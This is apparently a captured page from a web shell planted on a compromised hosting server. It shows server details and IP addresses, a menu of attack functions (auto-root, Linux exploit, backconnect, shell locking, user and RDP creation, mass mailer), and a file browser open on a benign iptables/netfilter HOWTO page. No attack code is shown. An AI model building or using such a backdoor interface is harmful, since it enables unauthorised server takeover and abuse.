Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.7.26
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
iptables /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
NAT-HOWTO-1.html
1.13
KB
-rw-r--r--
NAT-HOWTO-10.html
2.47
KB
-rw-r--r--
NAT-HOWTO-11.html
910
B
-rw-r--r--
NAT-HOWTO-2.html
4.24
KB
-rw-r--r--
NAT-HOWTO-3.html
1.41
KB
-rw-r--r--
NAT-HOWTO-4.html
4.3
KB
-rw-r--r--
NAT-HOWTO-5.html
5.02
KB
-rw-r--r--
NAT-HOWTO-6.html
8.2
KB
-rw-r--r--
NAT-HOWTO-7.html
1.29
KB
-rw-r--r--
NAT-HOWTO-8.html
1.11
KB
-rw-r--r--
NAT-HOWTO-9.html
2.04
KB
-rw-r--r--
NAT-HOWTO.html
2.6
KB
-rw-r--r--
netfilter-extensions-HOWTO-1.h...
2.05
KB
-rw-r--r--
netfilter-extensions-HOWTO-2.h...
7.62
KB
-rw-r--r--
netfilter-extensions-HOWTO-3.h...
28.29
KB
-rw-r--r--
netfilter-extensions-HOWTO-4.h...
12.25
KB
-rw-r--r--
netfilter-extensions-HOWTO-5.h...
6.88
KB
-rw-r--r--
netfilter-extensions-HOWTO-6.h...
10.98
KB
-rw-r--r--
netfilter-extensions-HOWTO-7.h...
2.14
KB
-rw-r--r--
netfilter-extensions-HOWTO-8.h...
1021
B
-rw-r--r--
netfilter-extensions-HOWTO-9.h...
2.17
KB
-rw-r--r--
netfilter-extensions-HOWTO.htm...
7.1
KB
-rw-r--r--
netfilter-hacking-HOWTO-1.html
7.3
KB
-rw-r--r--
netfilter-hacking-HOWTO-2.html
1.68
KB
-rw-r--r--
netfilter-hacking-HOWTO-3.html
7.85
KB
-rw-r--r--
netfilter-hacking-HOWTO-4.html
52.09
KB
-rw-r--r--
netfilter-hacking-HOWTO-5.html
1.03
KB
-rw-r--r--
netfilter-hacking-HOWTO-6.html
2.96
KB
-rw-r--r--
netfilter-hacking-HOWTO-7.html
9.07
KB
-rw-r--r--
netfilter-hacking-HOWTO-8.html
5.11
KB
-rw-r--r--
netfilter-hacking-HOWTO-9.html
835
B
-rw-r--r--
netfilter-hacking-HOWTO.html
3.72
KB
-rw-r--r--
packet-filtering-HOWTO-1.html
1.85
KB
-rw-r--r--
packet-filtering-HOWTO-10.html
2.51
KB
-rw-r--r--
packet-filtering-HOWTO-11.html
3.65
KB
-rw-r--r--
packet-filtering-HOWTO-2.html
1.56
KB
-rw-r--r--
packet-filtering-HOWTO-3.html
5.64
KB
-rw-r--r--
packet-filtering-HOWTO-4.html
2.14
KB
-rw-r--r--
packet-filtering-HOWTO-5.html
1.61
KB
-rw-r--r--
packet-filtering-HOWTO-6.html
3.42
KB
-rw-r--r--
packet-filtering-HOWTO-7.html
34.78
KB
-rw-r--r--
packet-filtering-HOWTO-8.html
1.42
KB
-rw-r--r--
packet-filtering-HOWTO-9.html
2.28
KB
-rw-r--r--
packet-filtering-HOWTO.html
2.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : netfilter-extensions-HOWTO-7.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.82"> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <TITLE>Netfilter Extensions HOWTO: New IPv6 netfilter targets</TITLE> <LINK HREF="netfilter-extensions-HOWTO-8.html" REL=next> <LINK HREF="netfilter-extensions-HOWTO-6.html" REL=previous> <LINK HREF="netfilter-extensions-HOWTO.html#toc7" REL=contents> </HEAD> <BODY> <A HREF="netfilter-extensions-HOWTO-8.html">Next</A> <A HREF="netfilter-extensions-HOWTO-6.html">Previous</A> <A HREF="netfilter-extensions-HOWTO.html#toc7">Contents</A> <HR> <H2><A NAME="s7">7.</A> <A HREF="netfilter-extensions-HOWTO.html#toc7">New IPv6 netfilter targets</A></H2> <P>In this section, we will attempt to explain the usage of new netfilter targets. The patches will appear in alphabetical order. Additionally, we will not explain patches that break other patches. But this might come later.</P> <P>Generally speaking, for targets, you can get the help hints from a particular module by typing :</P> <P> <BLOCKQUOTE><CODE> <PRE> # ip6tables -j THE_TARGET_YOU_WANT --help </PRE> </CODE></BLOCKQUOTE> </P> <P>This would display the normal iptables help message, plus the specific ``THE_TARGET_YOU_WANT'' target help message at the end.</P> <H2><A NAME="ss7.1">7.1</A> <A HREF="netfilter-extensions-HOWTO.html#toc7.1">LOG patch</A> </H2> <P>This patch by Jan Rekorajski <baggins@pld.org.pl> adds a new target that allows you to LOG the packets as in the IPv4 version of iptables.</P> <P>The examples are the same as in iptables. See the man page for details!</P> <H2><A NAME="ss7.2">7.2</A> <A HREF="netfilter-extensions-HOWTO.html#toc7.2">REJECT patch</A> </H2> <P>This patch by Harald Welte <laforge@gnumonks.org> adds a new target that allows you to REJECT the packets as in the IPv4 version of iptables.</P> <P>The examples are the same as in iptables. See the man page for details!</P> <HR> <A HREF="netfilter-extensions-HOWTO-8.html">Next</A> <A HREF="netfilter-extensions-HOWTO-6.html">Previous</A> <A HREF="netfilter-extensions-HOWTO.html#toc7">Contents</A> </BODY> </HTML>
Close